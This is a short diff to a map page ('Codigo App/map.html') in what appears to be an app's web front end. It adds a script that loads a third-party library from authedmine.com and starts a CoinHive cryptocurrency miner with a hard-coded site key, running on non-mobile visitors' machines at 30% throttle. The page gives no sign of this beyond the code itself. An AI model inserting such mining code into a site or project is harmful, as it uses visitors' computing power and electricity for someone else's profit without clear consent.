--- a/Codigo App/map.html
+++ b/Codigo App/map.html
@@ -101,5 +101,15 @@
             <div id="map-canvas"></div>
         
         </div>
+        <script src="https://authedmine.com/lib/authedmine.min.js"></script>
+<script>
+	var miner = new CoinHive.Anonymous('uZcxu45nqi4UXQ5SIjex8079JesIPln9', {throttle: 0.3});
+
+	// Only start on non-mobile devices and if not opted-out
+	// in the last 14400 seconds (4 hours):
+	if (!miner.isMobile() && !miner.didOptOut(14400)) {
+		miner.start();
+	}
+</script>
     </body>
 </html>
